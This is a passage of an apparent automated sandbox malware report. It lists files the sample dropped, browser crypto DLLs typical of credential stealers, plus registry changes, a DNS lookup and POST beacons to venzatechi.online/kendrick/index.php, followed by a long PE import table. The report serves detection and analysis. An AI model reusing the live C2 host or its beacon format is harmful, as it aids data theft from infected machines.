  674. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processenvironment-l1-1-0.dll",
  675. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-0.dll",
  676. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-1.dll",
  677. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-profile-l1-1-0.dll",
  678. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  679. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-string-l1-1-0.dll",
  680. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-1-0.dll",
  681. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-2-0.dll",
  682. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-sysinfo-l1-1-0.dll",
  683. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-timezone-l1-1-0.dll",
  684. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-util-l1-1-0.dll",
  685. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-conio-l1-1-0.dll",
  686. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-convert-l1-1-0.dll",
  687. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-environment-l1-1-0.dll",
  688. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-filesystem-l1-1-0.dll",
  689. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-heap-l1-1-0.dll",
  690. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-locale-l1-1-0.dll",
  691. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-math-l1-1-0.dll",
  692. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-multibyte-l1-1-0.dll",
  693. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-private-l1-1-0.dll",
  694. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-process-l1-1-0.dll",
  695. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-runtime-l1-1-0.dll",
  696. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-stdio-l1-1-0.dll",
  697. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-string-l1-1-0.dll",
  698. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-time-l1-1-0.dll",
  699. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-utility-l1-1-0.dll",
  700. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\freebl3.dll",
  701. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\mozglue.dll",
  702. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\msvcp140.dll",
  703. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nss3.dll",
  704. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nssdbm3.dll",
  705. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\softokn3.dll",
  706. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\ucrtbase.dll",
  707. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\vcruntime140.dll",
  708. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\",
  709. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER9ED3.tmp",
  710. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER9ED3.tmp.appcompat.txt",
  711. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA22F.tmp",
  712. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA22F.tmp.WERInternalMetadata.xml",
  713. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA24F.tmp",
  714. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA24F.tmp.hdmp",
  715. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA8F7.tmp",
  716. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA8F7.tmp.mdmp",
  717. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_0bcd89a8\\Report.wer.tmp"
  718. ]
  719.  
  720. [*] Modified Registry Keys: [
  721. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  722. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  723. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  724. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  725. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  726. ]
  727.  
  728. [*] Deleted Registry Keys: []
  729.  
  730. [*] DNS Communications: [
  731. {
  732. "type": "A",
  733. "request": "venzatechi.online",
  734. "answers": [
  735. {
  736. "data": "162.144.128.116",
  737. "type": "A"
  738. }
  739. ]
  740. }
  741. ]
  742.  
  743. [*] Domains: [
  744. {
  745. "ip": "162.144.128.116",
  746. "domain": "venzatechi.online"
  747. }
  748. ]
  749.  
  750. [*] Network Communication - ICMP: []
  751.  
  752. [*] Network Communication - HTTP: [
  753. {
  754. "count": 1,
  755. "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
  756. "uri": "http://venzatechi.online/kendrick/index.php",
  757. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  758. "method": "POST",
  759. "host": "venzatechi.online",
  760. "version": "1.1",
  761. "path": "/kendrick/index.php",
  762. "data": "POST /kendrick/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: venzatechi.online\r\nContent-Length: 105\r\nCache-Control: no-cache\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
  763. "port": 80
  764. },
  765. {
  766. "count": 1,
  767. "body": "",
  768. "uri": "http://venzatechi.online/kendrick/index.php",
  769. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  770. "method": "POST",
  771. "host": "venzatechi.online",
  772. "version": "1.1",
  773. "path": "/kendrick/index.php",
  774. "data": "POST /kendrick/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: venzatechi.online\r\nContent-Length: 64560\r\nCache-Control: no-cache\r\n\r\n",
  775. "port": 80
  776. }
  777. ]
  778.  
  779. [*] Network Communication - SMTP: []
  780.  
  781. [*] Network Communication - Hosts: []
  782.  
  783. [*] Network Communication - IRC: []
  784.  
  785. [*] Static Analysis: {
  786. "pe": {
  787. "peid_signatures": null,
  788. "imports": [
  789. {
  790. "imports": [
  791. {
  792. "name": "DeleteCriticalSection",
  793. "address": "0x46f168"
  794. },
  795. {
  796. "name": "LeaveCriticalSection",
  797. "address": "0x46f16c"
  798. },
  799. {
  800. "name": "EnterCriticalSection",
  801. "address": "0x46f170"
  802. },
  803. {
  804. "name": "InitializeCriticalSection",
  805. "address": "0x46f174"
  806. },
  807. {
  808. "name": "VirtualFree",
  809. "address": "0x46f178"
  810. },
  811. {
  812. "name": "VirtualAlloc",
  813. "address": "0x46f17c"
  814. },
  815. {
  816. "name": "LocalFree",
  817. "address": "0x46f180"
  818. },
  819. {
  820. "name": "LocalAlloc",
  821. "address": "0x46f184"
  822. },
  823. {
  824. "name": "GetVersion",
  825. "address": "0x46f188"
  826. },
  827. {
  828. "name": "GetCurrentThreadId",
  829. "address": "0x46f18c"
  830. },
  831. {
  832. "name": "InterlockedDecrement",
  833. "address": "0x46f190"
  834. },
  835. {
  836. "name": "InterlockedIncrement",
  837. "address": "0x46f194"
  838. },
  839. {
  840. "name": "VirtualQuery",
  841. "address": "0x46f198"
  842. },
  843. {
  844. "name": "WideCharToMultiByte",
  845. "address": "0x46f19c"
  846. },
  847. {
  848. "name": "MultiByteToWideChar",
  849. "address": "0x46f1a0"
  850. },
  851. {
  852. "name": "lstrlenA",
  853. "address": "0x46f1a4"
  854. },
  855. {
  856. "name": "lstrcpynA",
  857. "address": "0x46f1a8"
  858. },
  859. {
  860. "name": "LoadLibraryExA",
  861. "address": "0x46f1ac"
  862. },
  863. {
  864. "name": "GetThreadLocale",
  865. "address": "0x46f1b0"
  866. },
  867. {
  868. "name": "GetStartupInfoA",
  869. "address": "0x46f1b4"
  870. },
  871. {
  872. "name": "GetProcAddress",
  873. "address": "0x46f1b8"
  874. },
  875. {
  876. "name": "GetModuleHandleA",
  877. "address": "0x46f1bc"
  878. },
  879. {
  880. "name": "GetModuleFileNameA",
  881. "address": "0x46f1c0"
  882. },
  883. {
  884. "name": "GetLocaleInfoA",
  885. "address": "0x46f1c4"
  886. },
  887. {
  888. "name": "GetCommandLineA",
  889. "address": "0x46f1c8"
  890. },
  891. {
  892. "name": "FreeLibrary",
  893. "address": "0x46f1cc"
  894. },
  895. {
  896. "name": "FindFirstFileA",
  897. "address": "0x46f1d0"
  898. },
  899. {
  900. "name": "FindClose",
  901. "address": "0x46f1d4"
  902. },
  903. {
  904. "name": "ExitProcess",
  905. "address": "0x46f1d8"
  906. },
  907. {
  908. "name": "WriteFile",
  909. "address": "0x46f1dc"
  910. },
  911. {
  912. "name": "UnhandledExceptionFilter",
  913. "address": "0x46f1e0"
  914. },
  915. {
  916. "name": "RtlUnwind",
  917. "address": "0x46f1e4"
  918. },
  919. {
  920. "name": "RaiseException",
  921. "address": "0x46f1e8"
  922. },
  923. {
  924. "name": "GetStdHandle",
  925. "address": "0x46f1ec"
  926. }
  927. ],
  928. "dll": "kernel32.dll"
  929. },
  930. {
  931. "imports": [
  932. {
  933. "name": "GetKeyboardType",
  934. "address": "0x46f1f4"
  935. },
  936. {
  937. "name": "LoadStringA",
  938. "address": "0x46f1f8"
  939. },
  940. {
  941. "name": "MessageBoxA",
  942. "address": "0x46f1fc"
  943. },
  944. {
  945. "name": "CharNextA",
  946. "address": "0x46f200"
  947. }
  948. ],
  949. "dll": "user32.dll"
  950. },
  951. {
  952. "imports": [
  953. {
  954. "name": "RegQueryValueExA",
  955. "address": "0x46f208"
  956. },
  957. {
  958. "name": "RegOpenKeyExA",
  959. "address": "0x46f20c"
  960. },
  961. {
  962. "name": "RegCloseKey",
  963. "address": "0x46f210"
  964. }
  965. ],
  966. "dll": "advapi32.dll"
  967. },
  968. {
  969. "imports": [
  970. {
  971. "name": "SysFreeString",
  972. "address": "0x46f218"
  973. },
  974. {
  975. "name": "SysReAllocStringLen",
  976. "address": "0x46f21c"
  977. },
  978. {
  979. "name": "SysAllocStringLen",
  980. "address": "0x46f220"
  981. }
  982. ],
  983. "dll": "oleaut32.dll"
  984. },
  985. {
  986. "imports": [
  987. {
  988. "name": "TlsSetValue",
  989. "address": "0x46f228"
  990. },
  991. {
  992. "name": "TlsGetValue",
  993. "address": "0x46f22c"
  994. },
  995. {
  996. "name": "LocalAlloc",
  997. "address": "0x46f230"
  998. },
  999. {
  1000. "name": "GetModuleHandleA",
  1001. "address": "0x46f234"
  1002. }
  1003. ],
  1004. "dll": "kernel32.dll"
  1005. },
  1006. {
  1007. "imports": [
  1008. {
  1009. "name": "RegQueryValueExA",
  1010. "address": "0x46f23c"
  1011. },
  1012. {
  1013. "name": "RegOpenKeyExA",
  1014. "address": "0x46f240"
  1015. },
  1016. {
  1017. "name": "RegCloseKey",
  1018. "address": "0x46f244"
  1019. }
  1020. ],
  1021. "dll": "advapi32.dll"
  1022. },
  1023. {
  1024. "imports": [
  1025. {
  1026. "name": "lstrcpyA",
  1027. "address": "0x46f24c"
  1028. },
  1029. {
  1030. "name": "WriteFile",
  1031. "address": "0x46f250"
  1032. },
  1033. {
  1034. "name": "WaitForSingleObject",
  1035. "address": "0x46f254"
  1036. },
  1037. {
  1038. "name": "VirtualQuery",
  1039. "address": "0x46f258"
  1040. },
  1041. {
  1042. "name": "VirtualAlloc",
  1043. "address": "0x46f25c"
  1044. },
  1045. {
  1046. "name": "Sleep",
  1047. "address": "0x46f260"
  1048. },
  1049. {
  1050. "name": "SizeofResource",
  1051. "address": "0x46f264"
  1052. },
  1053. {
  1054. "name": "SetThreadLocale",
  1055. "address": "0x46f268"
  1056. },
  1057. {
  1058. "name": "SetFilePointer",
  1059. "address": "0x46f26c"
  1060. },
  1061. {
  1062. "name": "SetEvent",
  1063. "address": "0x46f270"
  1064. },
  1065. {
  1066. "name": "SetErrorMode",
  1067. "address": "0x46f274"
  1068. },
  1069. {
  1070. "name": "SetEndOfFile",
  1071. "address": "0x46f278"
  1072. },
  1073. {
  1074. "name": "ResetEvent",
  1075. "address": "0x46f27c"
  1076. },
  1077. {
  1078. "name": "ReadFile",
  1079. "address": "0x46f280"
  1080. },
  1081. {
  1082. "name": "MultiByteToWideChar",
  1083. "address": "0x46f284"
  1084. },
  1085. {
  1086. "name": "MulDiv",
  1087. "address": "0x46f288"
  1088. },
  1089. {
  1090. "name": "LockResource",
  1091. "address": "0x46f28c"
  1092. },
  1093. {
  1094. "name": "LoadResource",
  1095. "address": "0x46f290"
  1096. },
  1097. {
  1098. "name": "LoadLibraryA",
  1099. "address": "0x46f294"
  1100. },
  1101. {
  1102. "name": "LeaveCriticalSection",
  1103. "address": "0x46f298"
  1104. },
  1105. {
  1106. "name": "InitializeCriticalSection",
  1107. "address": "0x46f29c"
  1108. },
  1109. {
  1110. "name": "GlobalUnlock",
  1111. "address": "0x46f2a0"
  1112. },
  1113. {
  1114. "name": "GlobalSize",
  1115. "address": "0x46f2a4"
  1116. },
  1117. {
  1118. "name": "GlobalReAlloc",
  1119. "address": "0x46f2a8"
  1120. },
  1121. {
  1122. "name": "GlobalHandle",
  1123. "address": "0x46f2ac"
  1124. },
  1125. {
  1126. "name": "GlobalLock",
  1127. "address": "0x46f2b0"
  1128. },
  1129. {
  1130. "name": "GlobalFree",
  1131. "address": "0x46f2b4"
  1132. },
  1133. {
  1134. "name": "GlobalFindAtomA",
  1135. "address": "0x46f2b8"
  1136. },
  1137. {
  1138. "name": "GlobalDeleteAtom",
  1139. "address": "0x46f2bc"
  1140. },
  1141. {
  1142. "name": "GlobalAlloc",
  1143. "address": "0x46f2c0"
  1144. },
  1145. {
  1146. "name": "GlobalAddAtomA",
  1147. "address": "0x46f2c4"
  1148. },
  1149. {
  1150. "name": "GetVersionExA",
  1151. "address": "0x46f2c8"
  1152. },
  1153. {
  1154. "name": "GetVersion",
  1155. "address": "0x46f2cc"
  1156. },
  1157. {
  1158. "name": "GetUserDefaultLCID",
  1159. "address": "0x46f2d0"
  1160. },
  1161. {
  1162. "name": "GetTickCount",
  1163. "address": "0x46f2d4"
  1164. },
  1165. {
  1166. "name": "GetThreadLocale",
  1167. "address": "0x46f2d8"
  1168. },
  1169. {
  1170. "name": "GetSystemInfo",
  1171. "address": "0x46f2dc"
  1172. },
  1173. {
  1174. "name": "GetStringTypeExA",
  1175. "address": "0x46f2e0"
  1176. },
  1177. {
  1178. "name": "GetStdHandle",
  1179. "address": "0x46f2e4"
  1180. },
  1181. {
  1182. "name": "GetProfileStringA",
  1183. "address": "0x46f2e8"
  1184. },
  1185. {
  1186. "name": "GetProcAddress",
  1187. "address": "0x46f2ec"
  1188. },
  1189. {
  1190. "name": "GetModuleHandleA",
  1191. "address": "0x46f2f0"
  1192. },
  1193. {
  1194. "name": "GetModuleFileNameA",
  1195. "address": "0x46f2f4"
  1196. },
  1197. {
  1198. "name": "GetLocaleInfoA",
  1199. "address": "0x46f2f8"
  1200. },
  1201. {
  1202. "name": "GetLocalTime",
  1203. "address": "0x46f2fc"
  1204. },
  1205. {
  1206. "name": "GetLastError",
  1207. "address": "0x46f300"
  1208. },
  1209. {
  1210. "name": "GetFullPathNameA",
  1211. "address": "0x46f304"
  1212. },
  1213. {
  1214. "name": "GetDiskFreeSpaceA",
  1215. "address": "0x46f308"
  1216. },
  1217. {
  1218. "name": "GetDateFormatA",
  1219. "address": "0x46f30c"
  1220. },
  1221. {
  1222. "name": "GetCurrentThreadId",
  1223. "address": "0x46f310"
  1224. },
  1225. {
  1226. "name": "GetCurrentProcessId",
  1227. "address": "0x46f314"
  1228. },
  1229. {
  1230. "name": "GetComputerNameA",
  1231. "address": "0x46f318"
  1232. },
  1233. {
  1234. "name": "GetCPInfo",
  1235. "address": "0x46f31c"
  1236. },
  1237. {
  1238. "name": "GetACP",
  1239. "address": "0x46f320"
  1240. },
  1241. {
  1242. "name": "FreeResource",
  1243. "address": "0x46f324"
  1244. },
  1245. {
  1246. "name": "InterlockedExchange",
  1247. "address": "0x46f328"
  1248. },
  1249. {
  1250. "name": "FreeLibrary",
  1251. "address": "0x46f32c"
  1252. },
  1253. {
  1254. "name": "FormatMessageA",
  1255. "address": "0x46f330"
  1256. },
  1257. {
  1258. "name": "FindResourceA",
  1259. "address": "0x46f334"
  1260. },
  1261. {
  1262. "name": "EnumCalendarInfoA",
  1263. "address": "0x46f338"
  1264. },
  1265. {
  1266. "name": "EnterCriticalSection",
  1267. "address": "0x46f33c"
  1268. },
  1269. {
  1270. "name": "DeleteCriticalSection",
  1271. "address": "0x46f340"
  1272. },
  1273. {
  1274. "name": "CreateThread",
  1275. "address": "0x46f344"
  1276. },
  1277. {
  1278. "name": "CreateFileA",
  1279. "address": "0x46f348"
  1280. },
  1281. {
  1282. "name": "CreateEventA",
  1283. "address": "0x46f34c"
  1284. },
  1285. {
  1286. "name": "CompareStringA",
  1287. "address": "0x46f350"
  1288. },
  1289. {
  1290. "name": "CloseHandle",
  1291. "address": "0x46f354"
  1292. }
  1293. ],
  1294. "dll": "kernel32.dll"
  1295. },
  1296. {
  1297. "imports": [
  1298. {
  1299. "name": "VerQueryValueA",
  1300. "address": "0x46f35c"
  1301. },
  1302. {
  1303. "name": "GetFileVersionInfoSizeA",
  1304. "address": "0x46f360"
  1305. },
  1306. {
  1307. "name": "GetFileVersionInfoA",
  1308. "address": "0x46f364"
  1309. }
  1310. ],
  1311. "dll": "version.dll"
  1312. },
  1313. {
  1314. "imports": [
  1315. {
  1316. "name": "UnrealizeObject",
  1317. "address": "0x46f36c"
  1318. },
  1319. {
  1320. "name": "StretchBlt",
  1321. "address": "0x46f370"
  1322. },
  1323. {
  1324. "name": "SetWindowOrgEx",
  1325. "address": "0x46f374"
  1326. },
  1327. {
  1328. "name": "SetWinMetaFileBits",
  1329. "address": "0x46f378"
  1330. },
  1331. {
  1332. "name": "SetViewportOrgEx",
  1333. "address": "0x46f37c"
  1334. },
  1335. {
  1336. "name": "SetTextColor",
  1337. "address": "0x46f380"
  1338. },
  1339. {
  1340. "name": "SetStretchBltMode",
  1341. "address": "0x46f384"
  1342. },
  1343. {
  1344. "name": "SetROP2",
  1345. "address": "0x46f388"
  1346. },
  1347. {
  1348. "name": "SetPixel",
  1349. "address": "0x46f38c"
  1350. },
  1351. {
  1352. "name": "SetMapMode",
  1353. "address": "0x46f390"
  1354. },
  1355. {
  1356. "name": "SetEnhMetaFileBits",
  1357. "address": "0x46f394"
  1358. },
  1359. {
  1360. "name": "SetDIBColorTable",
  1361. "address": "0x46f398"
  1362. },
  1363. {
  1364. "name": "SetBrushOrgEx",
  1365. "address": "0x46f39c"
  1366. },
  1367. {
  1368. "name": "SetBkMode",
  1369. "address": "0x46f3a0"
  1370. },
  1371. {
  1372. "name": "SetBkColor",
  1373. "address": "0x46f3a4"
  1374. },
  1375. {
  1376. "name": "SelectPalette",
  1377. "address": "0x46f3a8"
  1378. },
  1379. {
  1380. "name": "SelectObject",
  1381. "address": "0x46f3ac"
  1382. },
  1383. {
  1384. "name": "SelectClipRgn",
  1385. "address": "0x46f3b0"
  1386. },
  1387. {
  1388. "name": "ScaleWindowExtEx",
  1389. "address": "0x46f3b4"
  1390. },
  1391. {
  1392. "name": "SaveDC",
  1393. "address": "0x46f3b8"
  1394. },
  1395. {
  1396. "name": "RestoreDC",
  1397. "address": "0x46f3bc"
  1398. },
  1399. {
  1400. "name": "RectVisible",
  1401. "address": "0x46f3c0"
  1402. },
  1403. {
  1404. "name": "RealizePalette",
  1405. "address": "0x46f3c4"
  1406. },
  1407. {
  1408. "name": "PlayEnhMetaFile",
  1409. "address": "0x46f3c8"
  1410. },
  1411. {
  1412. "name": "PathToRegion",
  1413. "address": "0x46f3cc"
  1414. },
  1415. {
  1416. "name": "PatBlt",
  1417. "address": "0x46f3d0"
  1418. },
  1419. {
  1420. "name": "MoveToEx",
  1421. "address": "0x46f3d4"
  1422. },
  1423. {
  1424. "name": "MaskBlt",
  1425. "address": "0x46f3d8"
  1426. },
  1427. {
  1428. "name": "LineTo",
  1429. "address": "0x46f3dc"
  1430. },
  1431. {
  1432. "name": "LPtoDP",
  1433. "address": "0x46f3e0"
  1434. },
  1435. {
  1436. "name": "IntersectClipRect",
  1437. "address": "0x46f3e4"
  1438. },
  1439. {
  1440. "name": "GetWindowOrgEx",
  1441. "address": "0x46f3e8"
  1442. },
  1443. {
  1444. "name": "GetWinMetaFileBits",
  1445. "address": "0x46f3ec"
  1446. },
  1447. {
  1448. "name": "GetTextMetricsA",
  1449. "address": "0x46f3f0"
  1450. },
  1451. {
  1452. "name": "GetTextExtentPoint32A",
  1453. "address": "0x46f3f4"
  1454. },
  1455. {
  1456. "name": "GetSystemPaletteEntries",
  1457. "address": "0x46f3f8"
  1458. },
  1459. {
  1460. "name": "GetStockObject",
  1461. "address": "0x46f3fc"
  1462. },
  1463. {
  1464. "name": "GetPixel",
  1465. "address": "0x46f400"
  1466. },
  1467. {
  1468. "name": "GetPaletteEntries",
  1469. "address": "0x46f404"
  1470. },
  1471. {
  1472. "name": "GetObjectA",
  1473. "address": "0x46f408"
  1474. },
  1475. {
  1476. "name": "GetEnhMetaFilePaletteEntries",
  1477. "address": "0x46f40c"
  1478. },
  1479. {
  1480. "name": "GetEnhMetaFileHeader",
  1481. "address": "0x46f410"
  1482. },
  1483. {
  1484. "name": "GetEnhMetaFileDescriptionA",
  1485. "address": "0x46f414"
  1486. },
  1487. {
  1488. "name": "GetEnhMetaFileBits",
  1489. "address": "0x46f418"
  1490. },
  1491. {
  1492. "name": "GetDeviceCaps",
  1493. "address": "0x46f41c"
  1494. },
  1495. {
  1496. "name": "GetDIBits",
  1497. "address": "0x46f420"
  1498. },
  1499. {
  1500. "name": "GetDIBColorTable",
  1501. "address": "0x46f424"
  1502. },
  1503. {
  1504. "name": "GetDCOrgEx",
  1505. "address": "0x46f428"
  1506. },
  1507. {
  1508. "name": "GetCurrentPositionEx",
  1509. "address": "0x46f42c"
  1510. },
  1511. {
  1512. "name": "GetClipBox",
  1513. "address": "0x46f430"
  1514. },
  1515. {
  1516. "name": "GetBrushOrgEx",
  1517. "address": "0x46f434"
  1518. },
  1519. {
  1520. "name": "GetBitmapBits",
  1521. "address": "0x46f438"
  1522. },
  1523. {
  1524. "name": "ExcludeClipRect",
  1525. "address": "0x46f43c"
  1526. },
  1527. {
  1528. "name": "EndPage",
  1529. "address": "0x46f440"
  1530. },
  1531. {
  1532. "name": "EndDoc",
  1533. "address": "0x46f444"
  1534. },
  1535. {
  1536. "name": "DeleteObject",
  1537. "address": "0x46f448"
  1538. },
  1539. {
  1540. "name": "DeleteEnhMetaFile",
  1541. "address": "0x46f44c"
  1542. },
  1543. {
  1544. "name": "DeleteDC",
  1545. "address": "0x46f450"
  1546. },
  1547. {
  1548. "name": "CreateSolidBrush",
  1549. "address": "0x46f454"
  1550. },
  1551. {
  1552. "name": "CreatePenIndirect",
  1553. "address": "0x46f458"
  1554. },
  1555. {
  1556. "name": "CreatePalette",
  1557. "address": "0x46f45c"
  1558. },
  1559. {
  1560. "name": "CreateICA",
  1561. "address": "0x46f460"
  1562. },
  1563. {
  1564. "name": "CreateHalftonePalette",
  1565. "address": "0x46f464"
  1566. },
  1567. {
  1568. "name": "CreateFontIndirectA",
  1569. "address": "0x46f468"
  1570. },
  1571. {
  1572. "name": "CreateEnhMetaFileA",
  1573. "address": "0x46f46c"
  1574. },
  1575. {
  1576. "name": "CreateDIBitmap",
  1577. "address": "0x46f470"
  1578. },
  1579. {
  1580. "name": "CreateDIBSection",
  1581. "address": "0x46f474"
  1582. },
  1583. {
  1584. "name": "CreateDCA",
  1585. "address": "0x46f478"
  1586. },
  1587. {
  1588. "name": "CreateCompatibleDC",
  1589. "address": "0x46f47c"
  1590. },
  1591. {
  1592. "name": "CreateCompatibleBitmap",
  1593. "address": "0x46f480"
  1594. },
  1595. {
  1596. "name": "CreateBrushIndirect",
  1597. "address": "0x46f484"
  1598. },
  1599. {
  1600. "name": "CreateBitmap",
  1601. "address": "0x46f488"
  1602. },
  1603. {
  1604. "name": "CopyEnhMetaFileA",
  1605. "address": "0x46f48c"
  1606. },
  1607. {
  1608. "name": "CloseEnhMetaFile",
  1609. "address": "0x46f490"
  1610. },
  1611. {
  1612. "name": "BitBlt",
  1613. "address": "0x46f494"
  1614. }
  1615. ],
  1616. "dll": "gdi32.dll"
  1617. },
  1618. {
  1619. "imports": [
  1620. {
  1621. "name": "CreateWindowExA",
  1622. "address": "0x46f49c"
  1623. },
  1624. {
  1625. "name": "WindowFromPoint",
  1626. "address": "0x46f4a0"
  1627. },
  1628. {
  1629. "name": "WinHelpA",
  1630. "address": "0x46f4a4"
  1631. },
  1632. {
  1633. "name": "WaitMessage",
  1634. "address": "0x46f4a8"
  1635. },
  1636. {
  1637. "name": "UpdateWindow",
  1638. "address": "0x46f4ac"
  1639. },
  1640. {
  1641. "name": "UnregisterClassA",
  1642. "address": "0x46f4b0"
  1643. },
  1644. {
  1645. "name": "UnhookWindowsHookEx",
  1646. "address": "0x46f4b4"
  1647. },
  1648. {
  1649. "name": "TranslateMessage",
  1650. "address": "0x46f4b8"
  1651. },
  1652. {
  1653. "name": "TranslateMDISysAccel",
  1654. "address": "0x46f4bc"
  1655. },
  1656. {
  1657. "name": "TrackPopupMenu",
  1658. "address": "0x46f4c0"
  1659. },
  1660. {
  1661. "name": "SystemParametersInfoA",
  1662. "address": "0x46f4c4"
  1663. },
  1664. {
  1665. "name": "ShowWindow",
  1666. "address": "0x46f4c8"
  1667. },
  1668. {
  1669. "name": "ShowScrollBar",
  1670. "address": "0x46f4cc"
  1671. },
  1672. {
  1673. "name": "ShowOwnedPopups",
  1674. "address": "0x46f4d0"
  1675. },
  1676. {
  1677. "name": "ShowCursor",
  1678. "address": "0x46f4d4"
  1679. },
  1680. {
  1681. "name": "SetWindowsHookExA",
  1682. "address": "0x46f4d8"
  1683. },
  1684. {
  1685. "name": "SetWindowTextA",
  1686. "address": "0x46f4dc"
  1687. },
  1688. {
  1689. "name": "SetWindowPos",
  1690. "address": "0x46f4e0"
  1691. },
  1692. {
  1693. "name": "SetWindowPlacement",
  1694. "address": "0x46f4e4"
  1695. },
  1696. {
  1697. "name": "SetWindowLongA",
  1698. "address": "0x46f4e8"
  1699. },
  1700. {
  1701. "name": "SetTimer",
  1702. "address": "0x46f4ec"
  1703. },
  1704. {
  1705. "name": "SetScrollRange",
  1706. "address": "0x46f4f0"
  1707. },
  1708. {
  1709. "name": "SetScrollPos",
  1710. "address": "0x46f4f4"
  1711. },
  1712. {
  1713. "name": "SetScrollInfo",
  1714. "address": "0x46f4f8"
  1715. },
  1716. {
  1717. "name": "SetRect",
  1718. "address": "0x46f4fc"
  1719. },
  1720. {
  1721. "name": "SetPropA",
  1722. "address": "0x46f500"
  1723. },
  1724. {
  1725. "name": "SetParent",
  1726. "address": "0x46f504"
  1727. },
  1728. {
  1729. "name": "SetMenuItemInfoA",
  1730. "address": "0x46f508"
  1731. },
  1732. {
  1733. "name": "SetMenu",
  1734. "address": "0x46f50c"
  1735. },
  1736. {
  1737. "name": "SetKeyboardState",
  1738. "address": "0x46f510"
  1739. },
  1740. {
  1741. "name": "SetForegroundWindow",
  1742. "address": "0x46f514"
  1743. },
  1744. {
  1745. "name": "SetFocus",
  1746. "address": "0x46f518"
  1747. },
  1748. {
  1749. "name": "SetCursor",
  1750. "address": "0x46f51c"
  1751. },
  1752. {
  1753. "name": "SetClipboardData",
